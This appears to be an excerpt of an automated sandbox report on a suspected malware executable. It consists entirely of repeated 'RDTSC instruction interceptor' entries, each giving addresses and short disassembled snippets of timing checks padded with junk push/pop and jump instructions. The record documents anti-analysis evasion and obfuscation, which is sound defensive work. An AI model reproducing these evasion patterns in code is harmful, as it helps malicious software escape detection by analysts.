                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D64F04 second address: D64F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D65056 second address: D6505C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D651F4 second address: D65211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC450201Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F0EC4502016h 0x00000011 jc 00007F0EC4502016h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D65211 second address: D65215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6597F second address: D6598F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6598F second address: D65993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D65993 second address: D659BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0EC4502027h 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D659BB second address: D659C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B03A second address: D6B03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B03E second address: D6B048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B048 second address: D6B04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6B04E second address: D6B052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CE5360 second address: CE5366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: CE5366 second address: CE536B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B2A second address: D69B34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B34 second address: D69B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B3F second address: D69B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B45 second address: D69B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D69B4B second address: D69B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6A95B second address: D6A95F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6AAD5 second address: D6AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502025h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D6AAF0 second address: D6AAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7020C second address: D7021B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC450201Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7021B second address: D7021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D70383 second address: D70390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0EC4502016h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D704F5 second address: D704FF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0EC4CB7FD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D704FF second address: D70505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7062B second address: D70630 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D70630 second address: D7063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 js 00007F0EC450201Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D7063F second address: D70649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D727FC second address: D72803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeRDTSC instruction interceptor: First address: D77E8F second address: D77E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D77E99 second address: D77ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0EC4502028h 0x00000010 jmp 00007F0EC4502026h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D778BA second address: D778C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D778C6 second address: D778DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502024h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D778DE second address: D778F0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F0EC4CB7FC6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D778F0 second address: D778F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D77BE8 second address: D77BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D7C312 second address: D7C321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jg 00007F0EC4502016h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D7C321 second address: D7C325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D7C325 second address: D7C33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F0EC450201Ch 0x00000010 jnl 00007F0EC4502016h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D7C46E second address: D7C474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D7C474 second address: D7C47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D26240 second address: D26244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D26244 second address: D2624E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D2624E second address: D26260 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnp 00007F0EC4CB7FD0h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D26260 second address: D262B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jmp 00007F0EC4502023h 0x0000000c mov ecx, dword ptr [ebp+122D1E8Dh] 0x00000012 mov ebx, dword ptr [ebp+1248A233h] 0x00000018 add eax, ebx 0x0000001a jp 00007F0EC450201Ch 0x00000020 nop 0x00000021 jmp 00007F0EC4502023h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F0EC450201Eh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D262B9 second address: D2630B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007F0EC4CB7FD1h 0x0000000f jmp 00007F0EC4CB7FCAh 0x00000014 pop ecx 0x00000015 push 00000004h 0x00000017 mov edx, dword ptr [ebp+122D30ACh] 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0EC4CB7FD6h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8100F second address: D81014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D81014 second address: D8101F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8101F second address: D81023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D804AB second address: D804B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D80A54 second address: D80A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D80A5A second address: D80A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D86C60 second address: D86C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D86DD5 second address: D86DF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnp 00007F0EC4CB7FC6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jns 00007F0EC4CB7FC6h 0x0000001d jnl 00007F0EC4CB7FC6h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D86DF9 second address: D86E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0EC4502016h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D86E05 second address: D86E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D86F72 second address: D86FA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4502024h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F0EC4502022h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D87ACA second address: D87ACF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8C7F3 second address: D8C7F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8CC24 second address: D8CC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0EC4CB7FC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8CC2E second address: D8CC38 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0EC4502016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8CC38 second address: D8CC3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D8CC3E second address: D8CC49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9A40B second address: D9A424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D98F33 second address: D98F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0EC4502024h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D98F4C second address: D98F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0EC4CB7FCAh 0x00000008 jno 00007F0EC4CB7FC6h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D98F63 second address: D98F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D990E4 second address: D990EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F0EC4CB7FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D990EF second address: D990F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D994C5 second address: D994E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F0EC4CB7FD7h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D98299 second address: D982B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0EC4502024h 0x0000000a pop edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9F78E second address: D9F794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9F932 second address: D9F94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0EC4502016h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007F0EC4502016h 0x00000012 jp 00007F0EC4502016h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9F94C second address: D9F96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F0EC4CB7FD0h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9F96B second address: D9F971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9F971 second address: D9F975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9F975 second address: D9F981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9FADA second address: D9FB07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0EC4CB7FD5h 0x00000007 jmp 00007F0EC4CB7FD4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: D9FB07 second address: D9FB0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB27E second address: DAB288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB288 second address: DAB28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB28C second address: DAB292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB292 second address: DAB298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB298 second address: DAB2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0EC4CB7FD5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB2B1 second address: DAB2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB2B5 second address: DAB2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0EC4CB7FC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0EC4CB7FD0h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAB2D8 second address: DAB2DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAFBDA second address: DAFBDF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAFD50 second address: DAFD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAFD54 second address: DAFD65 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0EC4CB7FC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DAFD65 second address: DAFD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 jmp 00007F0EC450201Bh 0x0000000e pushad 0x0000000f jns 00007F0EC4502016h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DB5366 second address: DB5370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0EC4CB7FC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DB5370 second address: DB537A instructions: 0x00000000 rdtsc 0x00000002 je 00007F0EC450201Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\cMTqzvmx9u.exe | RDTSC instruction interceptor: First address: DBCDB5 second address: DBCDCB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jp 00007F0EC4CB7FC6h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0EC4CB7FC6h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
